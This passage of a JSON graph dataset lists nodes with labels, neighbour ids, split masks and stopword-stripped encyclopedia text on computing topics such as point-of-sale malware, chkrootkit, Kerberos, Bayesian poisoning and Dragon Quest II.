      5681,
      6129,
      9137,
      10768,
      4125
    ],
    "mask": "None"
  },
  {
    "node_id": 6091,
    "label": 4,
    "text": "Point-of-sale_malware:point-of-sale malware point-of-sale malware pos malware usually type malicious software malware used cybercriminals target point sale pos payment terminals intent obtain credit card debit card information card track 1 track 2 data even cvv code various man-in-the-middle attacks interception processing retail checkout point sale system simplest evasive approach ram-scraping accessing system memory exporting copied information via remote access trojan rat minimizes software hardware tampering potentially leaving footprints pos attacks may also include use various bits hardware dongles trojan card readers wireless data transmitters receivers gateway transactions pos malware enables hackers process steal thousands even millions transaction payment data depending upon target number devices affected long attack goes undetected done outside card information usually encrypted sent payment processor authorization discovered 2011 installs windows computer service called rdasrv.exe scans track 1 track 2 credit card data using perl compatible regular expressions includes customer card holder ’ name account number expiry date cvv code discretionary information information gets scraped stored data.txt currentblock.txt sent hacker discovered october 2012 gets installed pc automatically gets embedded auto script loads malware memory scrapes credit card cc data pos software vskimmer scrapes information windows system detecting card readers attached reader sends captured data cyber criminal control server discovered december 2012 steal system information along track 1 track 2 card details help keylogger installed onto computer spyware created steal credit debit card information pos system blackpos gets pc stealth-based methods steals information send external server memory-scraping malware tracks track 2 data access card magnetic stripe help magnetic stripe readers sends data hacker clone fake credit cards fastpos malware pos malware discovered trend micro researchers strikes point sale system fast snatches credit debit card information sends data cyber criminal instantly malware capability exfiltrate track data using two techniques key logger memory scraper pandalabs discovered malware infects point sale system breach credit debit card details punkeypos malware uses two functions keylogger ram scraper steal information point sale terminal information stolen encrypted sent cybercriminal ’ control command server c c new variant pos malware point sale malware discovered fireeye follows new advanced technique steal retail customer ’ card information help lunh algorithm exfiltrate stolen information first block http ftp traffic monitors data exfiltration belongs family newposthings malware centerpos pos point sale malware found year 2015 september along malicious malware blackpos newposthings alina malware fireeye experts scrapes stolen credit debit card sends data http post request help triple des encryption malumpos point sale malware records point sale ’ data running oracle micros payment system breached 333,000 data world uses delphi programming language stealing credit debit card details stolen data sent cyber criminal sold black market",
    "neighbors": [
      7553,
      10509,
      8206,
      9102,
      7441,
      8978,
      9745,
      10392,
      9242,
      3629,
      10364,
      4672,
      10309,
      4304,
      4945,
      6360,
      218,
      7515,
      9569,
      5603,
      11621,
      4081,
      1781,
      4471,
      127,
      4863
    ],
    "mask": "Train"
  },
  {
    "node_id": 6092,
    "label": 4,
    "text": "Chkrootkit:chkrootkit chkrootkit check rootkit common unix-based program intended help system administrators check system known rootkits shell script using common unix/linux tools like codice_1 codice_2 commands search core system programs signatures comparing traversal codice_3 filesystem output codice_4 process status command look discrepancies used rescue disc typically live cd optionally use alternative directory run commands techniques allow chkrootkit trust commands upon depends bit inherent limitations reliability program attempts detect compromises rootkits computer viruses newer rootkits may specifically attempt detect compromise copies chkrootkit programs take measures evade detection",
    "neighbors": [
      5506,
      3395,
      6606,
      7983,
      8399,
      10387,
      5492,
      11188,
      823,
      1304,
      7192,
      186,
      7739,
      1150,
      9791
    ],
    "mask": "Train"
  },
  {
    "node_id": 6093,
    "label": 2,
    "text": "IBoot:iboot iboot stage 2 bootloader apple products replaces old bootloader bootx compared predecessor iboot improves authentication performed boot chain macos boot process starts running code stored secured uefi boot rom first stage boot rom two primary responsibilities initialize system hardware post component select operating system run uefi component ios boot process starts running device boot rom code systems s1 processors a9 earlier a-series processors boot rom loads low-level bootloader llb loads iboot systems newer processors boot rom loads iboot goes well iboot proceed load ios kernel well rest operating system llb iboot fails load ios fails verify ios bootloader jumps recovery mode otherwise loads remaining kernel modules macos iboot located codice_1 kernel drivers necessary booting loaded boot loader starts kernel ’ initialization procedure point enough drivers loaded kernel find root device",
    "neighbors": [
      11521,
      2819,
      1796,
      3719,
      4615,
      10888,
      11402,
      9100,
      5647,
      10512,
      1042,
      10130,
      8852,
      9109,
      7318,
      4888,
      3228,
      11037,
      2207,
      1439,
      811,
      3371,
      5292,
      1710,
      6700,
      7983,
      8877,
      1074,
      10036,
      3766,
      2232,
      9912,
      11257,
      9406,
      6849,
      4933,
      713,
      9418,
      9035,
      3790,
      7118,
      5713,
      3670,
      9430,
      4184,
      3035,
      4571,
      2141,
      4702,
      4068,
      2149,
      5093,
      487,
      231,
      4457,
      9451,
      9964,
      10221,
      8303,
      2288,
      499,
      2676,
      5363,
      6771,
      7928,
      8441,
      7163,
      7422
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6094,
    "label": 4,
    "text": "Bayesian_poisoning:bayesian poisoning bayesian poisoning technique used e-mail spammers attempt degrade effectiveness spam filters rely bayesian spam filtering bayesian filtering relies bayesian probability determine whether incoming mail spam spam spammer hopes addition random even carefully selected words unlikely appear spam message cause spam filter believe message legitimate—a statistical type ii error spammers also hope cause spam filter higher false positive rate turning previously innocent words spammy words bayesian database statistical type errors user trains spam filter poisoned message indicating filter words added spammer good indication spam spam conference held mit 2004 john graham-cumming presented two possible attacks popfile bayesian engine one unsuccessful worked impractical identified two types poisoning attack passive words added without feedback spammer active spammer gets feedback spam received passive method adding random words small spam ineffective method attack 0.04 modified spam messages delivered active attack involved adding random words small spam using web bug determine whether spam received another bayesian system trained using poison words sending 10,000 spams single user determined small set words could used get spam simple countermeasure disabling remote images web bugs emails eliminates problem conference email anti-spam 2004 wittel wu presented paper showed passive addition random words spam ineffective crm114 effective spambayes 100 words added per spam also showed smarter passive attack adding common english words still ineffective crm114 even effective spambayes needed add 50 words spam get past spambayes however wittel wu testing criticized due minimal header information present emails using bayesian spam filters make extensive use header information message metadata determining likelihood message spam discussion spambayes results counter evidence found spambayes mailing list archive attacks type ii attacks attacks attempt get spam delivered type attack attempts cause false positives turning previously innocent words spammy words bayesian database also 2004 stern mason shepherd wrote technical report dalhousie university detailed passive type ii attack added common english words spam messages used training testing spam filter two tests showed common words decreased spam filter precision percentage messages classified spam really spam 84 67 94 84 examining data shows poisoned filter biased towards believing messages likely spam ham good email thus increasing false positive rate proposed two countermeasures ignoring common words performing classification smoothing probabilities based trustworthiness word word trustworthy probability attacker unlikely able guess whether part individual vocabulary thus common words untrustworthy probability would smoothed 0.5 making neutral 2005 conference email anti-spam lowd meek presented paper demonstrated passive attacks adding random common words spam ineffective naïve bayesian filter fact showed john graham-cumming demonstrated back 2004 adding random words improves spam filtering accuracy demonstrated adding hammy words words likely appear ham non-spam email content spam effective naïve bayesian filter enabled spam slip went detail two active attacks attacks require feedback spammer effective spam filters course preventing feedback spammers non-delivery reports smtp level errors web bugs defeats active attack trivially also showed retraining filter effective preventing attack types even retraining data poisoned published research shows adding random words spam messages ineffective form attack active attacks effective adding carefully chosen words work cases defend attacks vital feedback received spammers statistical filters retrained regularly research also shows continuing investigate attacks statistical filters worthwhile working attacks demonstrated countermeasures required ensure statistical filters remain accurate",
    "neighbors": [
      3908,
      1771,
      8747,
      10450,
      1653,
      2969
    ],
    "mask": "None"
  },
  {
    "node_id": 6095,
    "label": 5,
    "text": "TCP_fusion:tcp fusion tcp fusion feature providing tcp loopback implemented transmission control protocol stack within oracle solaris-10 solaris-11 operating systems well number software projects based open source codebase opensolaris project idea trivial client server connection local loopback interface within system need entire tcp/ip protocol stack exchange data therefore provide faster data path fusion two end points source code well documented inet/tcp/tcp_fusion.c clearly states tcp fusion protocol-less data path tcp loopback connections fusion two local tcp endpoints occurs connection establishment time various conditions see details tcp_fuse need met fusion successful fails fall back regular tcp data path succeeds endpoints proceed use tcp_fuse_output transmit path tcp_fuse_output enqueues application data directly onto peer receive queue protocol processing involved sychronization handled squeue mutex tcp_non_sq_lock one requirements fusion succeed endpoints need using squeue ensures neither side disappear side still sending data flow control information manipulated outside squeue tcp_non_sq_lock must held touching tcp_flow_stopped feature may enabled disabled via /etc/system config file solaris genunix kernel line required set ip do_tcp_fusion 0x0 set feature false 0x1 hexadecimal true see https //github.com/illumos/illumos-gate/blob/master/usr/src/uts/common/inet/tcp/",
    "neighbors": [
      11363
    ],
    "mask": "Test"
  },
  {
    "node_id": 6096,
    "label": 3,
    "text": "Dragon_Quest_II:dragon quest ii dragon quest ii luminaries legendary line titled dragon warrior ii initially localized north america role-playing video game rpg developed chunsoft published enix 1987 family computer famicom part dragon quest series enix u.s. subsidiary published american version dragon warrior ii nintendo entertainment system nes 1990 dragon quest ii set one hundred years events first game game story centers prince midenhall ordered stop evil wizard named hargon hargon destroys moonbrooke castle adventure accompanied two cousins prince cannock princess moonbrooke dragon quest ii expands first game larger party areas explore multiple heroes enemies battle sailing ship game successor dragon quest iii follows ancestor main characters legendary hero erdrick three games collectively called erdrick saga trilogy planning began month original dragon quest released one major goal development exciting combat system inspired similar multi-character party systems one found wizardry artwork used basis characters monsters painted akira toriyama translated pixel art game hit delays due game balance fully corrected early sections game combined staff included students familiar coding debugging process pushed back release month developers also many ideas discarded due technical limitations famicom system though later incorporated subsequent remakes game sequel dragon quest iii dragon quest ii successful japan original famicom version shipped 2.4 million copies later game remade super famicom game boy color combined original dragon quest game release entitled dragon quest ii version game android ios released japan june 26 2014 worldwide october 9 2014 dragon quest ii luminaries legendary line game praised improving almost aspects original including better graphics larger world explore characters participate dynamic combat system dragon quest ii known one difficult dragon quest games especially late game retained reputation even later ports platforms made game somewhat forgiving dragon quest ii role-playing video game allows player control one character characteristics first game dragon quest series game introduced party system instead beginning game entire party common previous computer rpgs player begins game one character gradually recruits party members course game player controls characters move game world search treasure chests talk trade villagers equip weapons armor cast spells wandering fields towers caves seas dungeons player randomly encounters monsters game shifts battle mode game battle mode introduces groups monsters upgrade one-on-one battles dragon quest battle mode player gives orders characters fight monsters player defeats monsters characters gain experience points gold experience points raise characters experience levels improves characters attributes may also learn new spells win player must fight monsters improve characters experience levels get gold buy better weapons armor eventually player characters become strong enough make next town dungeon repeats player reaches final boss defeats however gameplay necessarily linear especially player gets boat exploration key component game game offers spots save game towns talking king minister saves game american version incorporated battery saved games rather password system original talking king also allows deletion moving saved games dragon quest ii noted greatly expanding upon gameplay previous game dragon quest game first series feature multiple heroes enemies battle well sailing ship also allowed player land ship anywhere making possible explore entire game world open-ended manner included new gameplay features weapons cast spells used battles compared predecessor dragon warrior ii offers wider array spells items much larger world game also expanded inventory management system predecessor giving character individual inventory holds eight items placing greater emphasis conservative item management characters dragon quest ii luminaries legendary line also first dragon quest game include game chance played lottery tickets player finds also first dragon quest game use multiple key types include travel doors warp gates dragon quest ii set one hundred years dragon quest story begins attack upon moonbrooke castle wizard hargon seeks summon demon malroth destroy world wounded soldier escaped battle fled kingdom midenhall informs king attack dies king commands son descendant erdrick known loto japanese translations later localizations defeat hargon prince begins quest alone later joined two cousins prince cannock princess moonbrooke finding prince cannock began similar journey time prince midenhall restore princess moonbrooke human form transformed dog hargon assault moonbrooke castle reduced ruins trio quest find defeat hargon secure ship allows travel across oceans reach new continents including alefgard dragon quest took place meet grandson dragonlord villain previous game gives party valuable information tells collecting five crests hidden around world party create charm rubiss allowing defeat hargon illusions obtaining charm rubiss party travels hargon castle ice-covered plateau rhone confronts hargon throne room hargon defeated offers malroth demon emerges destroy heroes together three heroes slay malroth return midenhall prince named new king like main games dragon quest series yuji horii wrote story dragon quest ii akira toriyama artwork koichi sugiyama composed music co-creator koichi nakamura chunsoft president directed game half programming planning dragon quest ii began april 1986 month release original dragon quest system memory map decided started development early july beginning development producer yukinobu chida asked director programmer koichi nakamura definite release date offhandedly set one development team divided two groups one designing story well monsters one programming initial deadline set early november game ultimately suffered small delay development team finished programming almost everything time initial release believed game could released end year japanese magazine weekly shōnen jump published november 11 1986 announced game would released late december however developers found game difficult delayed month adjust balance finish final version mid-december rushed deliver nintendo make physical game cartridges game released january 26 1987 developers believed dragon quest one-vs-one combat system tedious simple leveling system boring decided dragon quest ii use party system players controlling multiple characters another game time entitled wizardry players control party six characters directly nakamura saw liked idea wanted something similar due technical restrictions decided use three characters famicom video game system supports display eight sprites side side one game character used two units direction possible three characters talk non-playable character npc yuji horii believed many players would play dragon quest ii without first playing dragon quest thus players search party members development staff discussed idea deprecating stair command predecessor several times nakamura stated cave rhone found game inspired classic trick exit mazes always moving forward sticking right-hand side wall avoid traps story group monsters first thing designed monsters names skills personalities decided first drawn artist akira toriyama yuji horii allowed toriyama paint full drawings rather directly create pixel art would shown game artwork converted computer graphics toriyama unfamiliar computer graphics technology staff took charge many new monsters needed designed make game feel real process laborious toriyama also said compared manga comics used enjoyed painting balance experience positive yuji horii stated process like manga film creators quickly outlines story plot mind regard map design blank map used create physical shape place like castle cave tower key elements story created together afterwards scenarios mainly written friend hiroshi miyaoka compared write lines writing paper design map graph paper staff wrote two 5 mm graph papers a4 felt easy organizing manuscript thickness 15 cm compared predecessor game advanced nearly technological aspects koichi nakamura programmed several students since first time working team n't know delegate work communicate goals since students unfamiliar coding process know debug keep track whose code came nakamura caused delays programming maps first worked characters including numbered characters maps assigned lines designed npc moving route next step programming items final step setting monsters data converting toriyama artwork work completed end october due aforementioned balance issues game initially difficult especially later stages nakamura written program simulated every single combat used adjust game setting character leveling strength enemies players would encounter program failed account larger monster groups however fell outside model caused game difficult enemies leveling weapons power designed area koichi nakamura n't think boat players get boat land might quickly defeated developers realized balance problem modifications limiting number enemies midenhall groups three moving cannock castle closer midenhall castle due lack cartridge space many ideas abandoned development alternate ending lorasia prince assassinated prince cannock sister dies final battle elements later used remakes sequels subplot prince cannock cursed added super famicom remake later remakes also promontory olivia dragon quest iii initially idea dragon quest ii game cartridge rom capacity 1 mbit 10 bytes free space remains final products north american release game dragon warrior ii created enix published 1990 unlike original japanese famicom version used passwords saving nes version used internal battery backup instead record player progress storyline introduction moonbrooke presented exclusively dragon warrior ii japanese original game starts right injured soldier moonbrooke entering midenhall castle seeking help king dialogue american localization often used intentionally archaic english vocabulary among differences japanese version like dragon warrior american version dragon warrior ii censored aspects example used ghost-like sprite instead original defeated character coffin cross sprite koichi sugiyama composed directed music game first album dragon quest ii suite dragon quest ii ~gods evil spirits~ released february 1987 covers ten orchestra version soundtracks twenty-five minute original sound story suite performed tokyo strings ensemble tracks classical jazz august 20 1987 first family classic concert held concert dragon quest dragon quest ii nowiki /nowiki music performed tokyo strings ensemble later october 1987 concert recording released symphonic suite cd title dragon quest concert music dragon quest ii also released piano cd drama cd several symphonic suite albums dragon quest ii nowiki /nowiki musics also collected music compilations like symphonic suite dragon quest best selection vol.1 ~roto~ 1997 dragon quest game music super collection vol 1 – 3 2001–2002 symphonic suite dragon quest complete cd-box 2003 symphonic suite dragon quest scene-separated i~ix 2011 lonely boy background music game name password input interface single anna makino since original dragon quest opened pop song sugiyama decided use song make games stylistically connected music also used japan professional baseball team chiba lotte marines fight song song played wandering fields dragon quest unknown world also played hero area ending theme road journey also ending song related anime dragon quest ii ported msx computers february 1988 ported version many issues like choppy scrolling black-surround characters titles poor graphics along sluggish combat menus msx2 ported version released may 1988 japan december 18 1993 dragon quest ii remade combined dragon quest part dragon quest ii super famicom used dragon quest v nowiki /nowiki engine besides enhanced graphics sound gameplay also improved super famicom remake features improved enemy targeting system enemy defeated character assigned attack perform attack move character attack another enemy rather nothing like famicom version like successors players find stat-improving items pots dressers super famicom remake released japan 1999 dragon quest ii released game boy color game also compatible game boy year later localized america dragon warrior ii remake similar super famicom version 8-bit graphics compared nes version featured better graphics less difficult remake also provided quick-save function allow players save load game anywhere unless reset game boy game boy color localization main characters towns names retranslated similar original japanese names legendary hero erdrick retranslated loto castle name midenhall re-dubbed lorasia original translation lot errors enix changed names help fix dragon quest ii remade japanese ntt docomo brand cell phones 2005 remakes size four times bigger original dragon quest port since phone capacity limited game divided two parts first part pre-installed cell phones second part could downloaded free world map provided pre-installed pdf file 2006 japanese mobile companies brew softbank also started selling game mobile platforms famicom super famicom versions game along dragon quest dragon quest iii re-released dragon quest 25th anniversary collection compilation wii japan september 15 2011 wii compilation featured interruptive save functions games compilation also included original copies strategy guides games along original artwork material games development square enix announced first eight dragon quest titles would re-released android ios japan dragon quest ii based previous cell phone version optimized smartphones released june 26 2014 japan english version released october 9 2014 title dragon quest ii luminaries legendary line square enix registed trademark japan 2013 united states early 2014 several guide books published first published shueisha february 1987 second tokuma shoten july 1987 third game publisher enix 1988 official guide book similar early main games series dragon quest ii novelized adapted game books dragon quest ii novel written hideo takayashiki published 1989 reprinted 1991 2000 dragon quest ii game book series also published 1989 famicom version sold approximately 2.4 million copies japan together super famicom game boy color remakes shipped excess 1.92 million copies worldwide japan mobile version downloaded one million times game included 2011 compilation called dragon quest collection wii sold 403,953 copies dragon quest ii received critical financial success japan readers gave score 28.02 30 named best overall cartridge game year 2006 readers famitsu magazine voted game 17th best video game time game generally known fixing problems found first game including improvements allowing parties three characters larger world better graphics ability carry items noted improvements keys used multiple times new strategic elements introduced larger parties larger groups enemies game music often praised despite limited 8-bit capabilities considered classic rpg genre game regarded praiseworthy japanese reviews highlighted famicom version difficulty stemming issues many traps cave rhone final boss ability cast healall spell led critics calling game difficult dragon quest dragon quest iii released director koichi nakamura said result dragon quest ii received favourable everybody creator side feel half wanted remakes dragon quest ii also successful well received famitsu awarded japanese super famicom remake 35/40 game boy color remake got 30/40 famitsu u.s. version dragon warrior ii received fairly high marks including 8.0 10 ign 9.6 10 gamespot 8 10 nintendo power also received rpgamer game boy color award year 2000 release dragon quest ii also promoted sales original dragon quest success dragon quest ii series became japanese cultural phenomenon sequel dragon quest ii dragon quest iii seeds salvation released 1988 japan serves prequel first two games follows ancestor main characters legendary hero erdrick three games collectively called erdrick saga trilogy also success game boy color remake enix released game boy color dragon warrior iii 2001 based japan-only super famicom update original dragon quest iii world dragon quest ii later used setting game boy advance",
    "neighbors": [
      5762,
      3181,
      9006,
      7023,
      10931
    ],
    "mask": "Test"
  },
  {
    "node_id": 6097,
    "label": 4,
    "text": "DShield:dshield dshield community-based collaborative firewall log correlation system receives logs volunteers worldwide uses analyze attack trends used data collection engine behind sans internet storm center isc dshield officially launched end november 2000 johannes ullrich since grown dominating attack correlation engine worldwide coverage dshield regularly used media cover current events analysis provided dshield used early detection several worms like ramen code red leaves sql snake dshield data regularly used researchers analyze attack patterns goal dshield project allow access correlated information public charge raise awareness provide accurate current snapshots internet attacks several data feeds provided users either include web sites use aide analyze events",
    "neighbors": [
      4467,
      3852,
      183
    ],
    "mask": "None"
  },
  {
    "node_id": 6098,
    "label": 4,
    "text": "Kerberos_(protocol):kerberos protocol kerberos computer-network authentication protocol works basis tickets allow nodes communicating non-secure network prove identity one another secure manner protocol named character kerberos cerberus greek mythology ferocious three-headed guard dog hades designers aimed primarily client–server model provides mutual authentication—both user server verify identity kerberos protocol messages protected eavesdropping replay attacks kerberos builds symmetric key cryptography requires trusted third party optionally may use public-key cryptography certain phases authentication kerberos uses udp port 88 default massachusetts institute technology mit developed kerberos protect network services provided project athena protocol based earlier needham–schroeder symmetric key protocol several versions protocol exist versions 1–3 occurred internally mit kerberos version 4 primarily designed steve miller clifford neuman published late 1980s version 4 also targeted project athena neuman kohl published version 5 1993 intention overcoming existing limitations security problems version 5 appeared rfc 1510 made obsolete rfc 4120 2005 authorities united states classified kerberos auxiliary military equipment us munitions list banned export used data encryption standard des encryption algorithm 56-bit keys non-us kerberos 4 implementation kth-krb developed royal institute technology sweden made system available outside us us changed cryptography export regulations circa 2000 swedish implementation based limited version called ebones ebones based exported mit bones release stripped encryption functions calls based version kerberos 4 patch-level 9 2005 internet engineering task force ietf kerberos working group updated specifications updates included mit makes implementation kerberos freely available copyright permissions similar used bsd 2007 mit formed kerberos consortium foster continued development founding sponsors include vendors oracle apple inc. google microsoft centrify corporation teamf1 inc. academic institutions royal institute technology sweden stanford university mit vendors cybersafe offering commercially supported versions windows 2000 later versions use kerberos default authentication method microsoft additions kerberos suite protocols documented rfc 3244 microsoft windows 2000 kerberos change password set password protocols rfc 4757 documents microsoft use rc4 cipher microsoft uses extends kerberos protocol use mit software kerberos used preferred authentication method general joining client windows domain means enabling kerberos default protocol authentications client services windows domain domains trust relationships domain contrast either client server joined domain part trusted domain environment windows instead use ntlm authentication client server intranet web applications enforce kerberos authentication method domain joined clients using apis provided sspi many unix unix-like operating systems including freebsd openbsd apple macos red hat enterprise linux oracle solaris ibm aix z/os hp hp-ux openvms others include software kerberos authentication users services embedded implementation kerberos v authentication protocol client agents network services running embedded platforms also available companies client authenticates server forwards username key distribution center kdc kdc issues ticket-granting ticket tgt time stamped encrypts using ticket-granting service tgs secret key returns encrypted result user workstation done infrequently typically user logon tgt expires point although may transparently renewed user session manager logged client needs communicate another node principal kerberos parlance service node client sends tgt tgs usually shares host kdc service must registered tgt service principal name spn client uses spn request access service verifying tgt valid user permitted access requested service tgs issues ticket session keys client client sends ticket service server ss along service request protocol described detail data encryption standard des cipher used combination kerberos longer internet standard weak security vulnerabilities exist many legacy products implement kerberos updated use newer ciphers like aes instead des november 2014 microsoft released patch ms14-068 rectify exploitable vulnerability windows implementation kerberos key distribution center kdc vulnerability purportedly allows users elevate abuse privileges domain level",
    "neighbors": [
      513,
      517,
      7,
      537,
      2080,
      2083,
      2087,
      4140,
      3629,
      5166,
      8758,
      4663,
      8760,
      9786,
      2112,
      6750,
      2143,
      10341,
      9320,
      5225,
      10344,
      2163,
      9336,
      4729,
      2168,
      8828,
      7804,
      5254,
      4242,
      6808,
      9884,
      6816,
      8358,
      168,
      5800,
      1709,
      1222,
      7368,
      8404,
      2274,
      6888,
      6381,
      8443,
      5373,
      3328,
      4874,
      2315,
      8977,
      1304,
      7983,
      10033,
      5433,
      6975,
      10058,
      6993,
      4435,
      2395,
      8539,
      362,
      10631,
      4490,
      3477,
      929,
      9635,
      2477,
      431,
      6064,
      10673,
      10677,
      5568,
      3521,
      4552,
      8670,
      8674,
      7139,
      5093,
      1511,
      2027,
      1012,
      8694,
      3577,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 6099,
    "label": 4,
    "text": "European_Information_Technologies_Certification:european information technologies certification european information technologies certification eitc programme international professional ict knowledge skills certification standard developed governed eitci institute non-profit organization based brussels provides certification individuals knowledge skills narrow specialized single-subject areas ict office software computer-aided project management online collaboration systems raster graphics processing",
    "neighbors": [
      6105
    ],
    "mask": "Test"
  },
  {
    "node_id": 6100,
    "label": 2,
    "text": "MiNT:mint mint tos mint free software alternative operating system kernel atari st system successors multi-tasking alternate tos magic together free system components fvdi device drivers xaaes graphical user interface widgets teradesk file manager mint provides free tos compatible replacement os multitask work mint began 1989 developer eric smith trying port gnu library related utilities atari st tos turned quickly much easier add unix-like layer tos patch gnu software mint began tos extension help porting mint originally released eric smith mint tos recursive acronym style gnu unix may 1990 new kernel got traction people contributing port minix filesystem port atari tt time atari looking enhance tos multitasking abilities found mint could fulfill job hired eric smith mint adopted official alternative kernel release atari falcon slightly altering mint acronym mint tos atari bundled mint multitasking version graphics environment manager gem name multitos floppy disk based installer atari left computer market mint development continued name freemint maintained team volunteers freemint development follows classic open-source approach source code hosted public cvs concurrent versions system repository development discussed public mailing list development since moved publicly browsable freemint git repository github mailing list still maintained sourceforge earlier 2014 move atariforge maintained almost 20 years minimal install mint run atari st stock 8 mhz 68000 cpu 4 mb ram harddrive highly recommended atari computer 16 mhz 68030 cpu 8 mb ram used mint also run inside emulators hatari steem networking 68040 virtual machine aranym freemint provides kernel several linux distributions support mint notably rpm package manager rpm based sparemint debian gnu/mint porting effort although freemint use graphical user interface tos graphics environment manager gem application environment services aes better served enhanced aes use multi-tasking abilities default one currently xaaes developed freemint kernel module older n.aes also works however modern alternative myaes",
    "neighbors": [
      1668,
      8262,
      5096,
      2345,
      7305,
      7849,
      5612,
      7983,
      2290,
      5363,
      2197,
      3797,
      5397,
      6104,
      1530,
      7483,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6101,
    "label": 1,
    "text": "Suppliers_and_Parts_database:suppliers parts database suppliers parts database example relational database referred extensively literature described detail c. j date introduction 8ed simple database comprising three tables supplier part shipment often used minimal exemplar interrelationships found database following sql schema one possible expression suppliers-and-parts database notes",
    "neighbors": [
      10632,
      3556,
      9286
    ],
    "mask": "None"
  },
  {
    "node_id": 6102,
    "label": 9,
    "text": "Reserved_word:reserved word computer language reserved word also known reserved identifier word used identifier name variable function label – reserved use syntactic definition reserved word may meaning closely related often conflated notion keyword word special meaning particular context semantic definition contrast names standard library built language considered reserved words keywords terms reserved word keyword often used interchangeably – one may say reserved word reserved use keyword – formal use varies language language article distinguish general reserved words keywords need coincide modern languages keywords subset reserved words makes parsing easier since keywords confused identifiers languages like c python reserved words keywords coincide languages like java keywords reserved words reserved words keywords – reserved future use yet languages older languages algol fortran pl/i keywords reserved words keywords distinguished identifiers means makes parsing difficult look-ahead parsers necessary sets reserved words keywords language often coincide almost equal distinction subtle terms often used interchangeably however careful usage distinguished making keywords reserved words makes lexing easier string characters unambiguously either keyword identifier without depending context thus keywords usually subset reserved words however reserved words need keywords – example java codice_1 reserved word meaning appear production rules grammar usually done forward compatibility reserved word may become keyword future version without breaking existing programs conversely keywords need reserved words role understood context may distinguished another manner stropping example phrase codice_2 unambiguous grammars since control statement clause start codice_3 thus allowed languages fortran alternatively algol 68 keywords must stropped – marked way distinguished – strict language listing bold thus reserved words thus strict language following expression legal bold keyword conflict ordinary identifier codice_4 however algol 68 also stropping regime keywords reserved words example distinct concepts often coincide followed many modern languages reserved word one looks like normal word allowed used normal word formally means satisfies usual lexical syntax syntax words identifiers – example sequence letters – used identifiers used example word codice_4 commonly reserved word codice_6 generally codice_7 valid assignment codice_2 keywords varied uses primarily fall classes part phrase grammar specifically production rule nonterminal symbols various meanings often used control flow word codice_4 procedural languages indicates conditional takes clauses nonterminal symbols names primitive types language support type system codice_10 primitive literal values codice_11 boolean true sometimes special commands like codice_12 uses keywords phrases input/output codice_13 distinct definitions clear language analyzed combination lexer parser syntax language generated lexical grammar words context-free grammar production rules phrases common analyzing modern languages case keywords subset reserved words must distinguished identifiers word level hence reserved words syntactically analyzed differently phrase level keywords case reserved words defined part lexical grammar tokenized separate type distinct identifiers conventional notation reserved words codice_4 codice_15 example tokenized types codice_16 codice_17 respectively codice_6 codice_19 tokenized type codice_20 keywords contrast syntactically appear phrase grammar terminal symbols example production rule conditional expression may codice_21 case codice_16 codice_17 terminal symbols meaning token type codice_16 codice_17 respectively – due lexical grammar means string codice_4 codice_15 original source example primitive constant value codice_11 may keyword representing boolean value true case appear grammar possible expansion production codice_29 instance beyond reserving specific lists words languages reserve entire ranges words use private spaces future language version different dialects compiler vendor-specific extensions internal use compiler notably name mangling often done using prefix often one underscores c c++ notable respect c99 reserves identifiers start two underscores underscore followed uppercase letter reserves identifiers start single underscore ordinary tag spaces use file scope c++03 reserves identifiers contain double underscore anywhere – allows use double underscore separator connect user identifiers instance frequent use double underscores internal identifiers python gave rise abbreviation dunder coined mark jackson independently tim hochberg within minutes reply question 2002 list reserved words keywords language defined language developed form part language formal specification generally one wishes minimize number reserved words avoid restricting valid identifier names introducing new reserved words breaks existing programs use word backwards compatible avoided prevent provide forward compatibility sometimes words reserved without current use reserved word keyword allows word used future without breaking existing programs alternatively new language features implemented predefineds overridden thus breaking existing programs reasons flexibility include allowing compiler vendors extend specification including non-standard features different standard dialects language extend future versions language include additional features example procedural language may anticipate adding object-oriented capabilities future version dialect point one might add keywords like codice_30 codice_31 accommodate possibility current specification may make reserved words even currently used notable example java codice_32 codice_1 reserved words — meaning java also used identifiers reserving terms implemented future versions java desired without breaking older java source code example proposal 1999 add c++-like codice_32 language possible using codice_32 word since reserved currently unused however proposal rejected – notably even though adding feature would break existing programs using standard library notably collections would break compatibility javascript also contains number reserved words without special functionality exact list varies version mode languages differ significantly frequently introduce new reserved words keywords name languages conservative introducing new keywords rarely never avoid breaking existing programs languages introduce new keywords freely requiring existing programs change existing identifiers conflict case study given new keywords c11 compared c++11 2011 – recall c c++ identifiers begin underscore followed uppercase letter reserved c11 introduced keyword codice_36 within existing set reserved words certain prefix used separate facility macro processing allow use new keyword without prefixing c++11 introduce keyword codice_37 despite existing reserved word breaking programs used without requiring macro processing related notion reserved words predefined functions methods subroutines variables particularly library routines standard library similar part basic language may used similar purposes however differ name predefined function method subroutine typically categorized identifier instead reserved word treated specially syntactic analysis reserved words may redefined programmer predefineds often overridden capacity languages vary provided keyword predefined languages instance provide keywords input/output operations whereas others library routines python versions earlier 3.0 many basic dialects codice_13 keyword contrast c lisp python 3.0 equivalents codice_39 codice_40 codice_13 functions standard library similarly python prior 3.0 codice_42 codice_43 codice_44 predefined variables reserved words python 3.0 made reserved words use terms keyword reserved word interchangeably others distinguish usage say using keyword mean word special certain contexts reserved word mean special word used user-defined name meaning keywords — indeed meaning notion keyword — differs widely language language concretely algol 68 keywords stropped strict language written bold reserved words – unstropped word used ordinary identifier java language specification uses term keyword iso 9899 standard c programming language uses term keyword many languages c similar environments like c++ keyword reserved word identifies syntactic form words used control flow constructs codice_15 codice_46 keywords languages keywords also used names variables functions languages algol algol 68 keywords written verbatim must stropped means keywords must marked somehow e.g quoting prefixing special character consequence keywords reserved words thus word used normal identifier however one stropping regime strop keywords instead simply reserved words languages postscript extremely liberal approach allowing core keywords redefined specific purposes common lisp term keyword keyword symbol used special sort symbol identifier unlike symbols usually stand variables functions keywords self-quoting self-evaluating interned keyword package keywords usually used label named arguments functions represent symbolic values symbols name functions variables special forms macros package named common-lisp basically reserved words effect redefining undefined ansi common lisp binding possible instance expression codice_47 possible codice_4 local variable leftmost codice_4 refers codice_4 operator remaining symbols interpreted variable names since separate namespace functions variables codice_4 could local variable common lisp however two special symbols keyword package symbols codice_52 codice_53 evaluated expressions evaluate used names functions variables de facto reserved codice_54 well-formed expression codice_55 operator permit usage typically programmer attempts use keyword variable function name compilation error triggered modern editors keywords automatically set particular text colour remind inform programmers keywords languages macros lazy evaluation control flow constructs codice_4 implemented macros functions languages without expressive features generally keywords languages numbers reserved words example java c derivatives rather sparse complement reserved words—approximately 50 – whereas cobol approximately 400 end spectrum pure prolog 